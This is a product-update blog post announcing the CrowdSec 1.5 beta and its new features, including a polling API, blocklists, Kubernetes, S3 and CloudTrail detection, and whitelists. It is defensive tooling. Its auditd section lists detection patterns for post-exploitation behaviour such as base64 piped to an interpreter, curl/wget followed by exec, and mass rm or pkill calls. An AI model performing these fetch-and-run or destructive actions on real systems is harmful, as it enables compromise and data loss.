Want to improve the security of your ecommerce website?

Learn how

CrowdSec 1.5 arriving this summer – be the first to test it out now!

We are excited to share that CrowdSec 1.5 will be dropping in July with tons of new features and capabilities. Before we fully launch it, we will first be sharing the beta version on April 1st with some of our community members so they can test out the biggest version of Crowdsec since 1.0. Take a look at what will be in this version and at the very bottom, you can sign up to be one of the first to try it out. 

Polling API Integration

With the polling API, the Console can now send orders to the CrowdSec instances. Allowing users to manage their decisions (banned IPs at a given time). Let’s dive into what that means. 

Real-time decisions management

This is very useful for users with a lot of instances. For example, if you have 500 instances and want to ban an IP on all your machines, you would typically need to do some sort of automation such as a script to do it. Now, you can easily do it from the Console from the comfort of a single page. 

Teaser: Secure and custom configure the fleet of instances from the Console

In the future, the polling API feature will allow users to set up parsers and scenarios directly from the CrowdSec Console.

New Blocklist API

We recently announced the external IP blocklists which allow all Console users to subscribe to at least 2 third-party blocklists selected by our expert team as well as 3 premium blocklists for our Enterprise users. We have since gathered a large number of significant data that we were able to build bigger blocklists. The blocklists are more robust and have no performance impact when you subscribe to them. 

Kubernetes audit acquisition

The feature we presented at Kubehuddle UK 2022 is finally here:

We could already protect services within Kubernetes but now we can detect malicious behaviors at the cluster level: privileged pod creation, exec into a pod, mounting a sensitive host folder, anonymous API access, API brute force etc.

S3 audit acquisition

Crowdsec now supports reading logs stored in S3 bucket, allowing you to process logs generated by AWS services (such as ALB access logs or Cloudfront logs)

Auditd support

Allows to detect “Post Exploitation Behaviors” among which:

  • base64 + interpreter (perl/bash/python)
  • curl/wget and exec
  • pkill execve bursts
  • rm execve bursts
  • exec from suspicious locations

CrowdSec CTI API helpers

Query CTI from parsers and scenarios and react differently based on their reputation, classification, and/or from the known false positives. 

This new CTI API allows CrowdSec and the CTI to be more interactive with each other, allowing users to get much more information on a certain IP. For example, you can understand what the machine is doing, what kind of usage it is doing as well as what kind of attacks it has received. CrowdSec is now able to query all this data in real-time and can help users detect false positives and it also helps with alert fatigue. 

Not only can you leverage the alert fatigue from the Console but also from your software. Alerts will only be sent once for the same malicious IP. We alert on how confident we are with the activity that IP is doing. 

AWS Cloudtrail Scenarios

Thanks to 1.5’s new behavior detection capabilities, we were able to create an advanced AWS Cloudtrail scenario helping you to detect and better understand what’s happening on your cloud.

  • Detect AWS CloudTrail configuration change
  • Detect AWS Config configuration change
  • Detect AWS console authentication failure
  • Detect AWS IAM policy change
  • Detect AWS KMS key deletion
  • Detect login without MFA to the AWS console
  • Detect AWS NACL change
  • Detect AWS Network Gateway change
  • Detect AWS root account usage
  • Detect AWS route table change
  • Detect AWS S3 bucket policy change
  • Detect AWS Security Group change
  • Detect AWS API unauthorized calls
  • Detect AWS VPC change

Feature flag support

This new feature allows us to have some features within the Security Engine that are disabled by default but can be activated manually by the user.

This will facilitate the inclusion of beta features safely and give more chances to the community to preview what’s coming and help us test them in diverse use cases

Detection Engine improvements

  • Conditional buckets: an improvement of our behavior detection system allows for more complex expression for the alert triggering mechanism
  • Event data stash: allows parsers to capture data for future enrichment. Adding the capability to detect advanced malicious behaviors

CAPI Whitelist

While the community blocklist is highly curated, and designed to avoid false positives, sometimes a shared IP used by both innocent and malicious actors will end up in it, so we’ve added the capability to create whitelists that also apply to the community blocklist.

Conclusion

We are rolling out the beta version on April 1st and will allow a handful of our community members to test it out. If you are interested in being one of the first to test it out and give us your feedback, contact us! We will allow all testers to have 2 months free of all the new features as well as premium ones, as thanks for helping us with this new version. 

Test CrowdSec version 1.5

WRITTEN BY

You may also like

am i under attack
Product Updates

Am I Under Attack: Cut Through the Noise to Detect Sophisticated and Targeted Attacks with CrowdSec’s New feature

Am I Under Attack leverages advanced AI algorithms to detect anomalies in your logs indicating more sophisticated or targeted attacks.

new and advanced ip lookup search
Product Updates

Introducing the New and Advanced IP Lookup Search

In a previous article, we introduced the CTI Report, this time, we are taking it a step further and introducing new and advanced search options for our IP lookup.  You now have access to multiple search options to accurately and effectively explore the CrowdSec CTI.   Let’s take a look. IP lookup search These new search […]

Discover CrowdSec’s Free Third-Party Blocklists
Product Updates

Discover CrowdSec’s Free Third-Party Blocklists

In case you missed it, we recently announced the new Blocklists Catalog in the CrowdSec Console. In the catalog, you can find several blocklists centralized in one place, including third-party blocklists that are free to all users.  All users on the CrowdSec Console can subscribe their Security Engines to third-party blocklists to secure their systems […]